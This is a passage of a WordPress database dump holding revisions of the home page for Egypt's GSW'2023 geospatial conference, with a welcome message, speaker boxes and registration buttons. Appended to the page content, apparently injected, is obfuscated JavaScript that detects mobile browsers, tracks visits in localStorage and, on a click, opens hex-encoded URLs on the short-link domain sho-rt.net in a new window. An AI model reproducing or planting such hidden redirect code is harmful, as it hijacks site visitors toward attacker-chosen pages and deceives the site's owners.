ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-20 12:19:37','2022-10-20 12:19:37','',2167,'https://gsw2023.com/?p=2916',0,'revision','',0),
(2917,1,'2022-10-20 12:22:52','2022-10-20 12:22:52','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 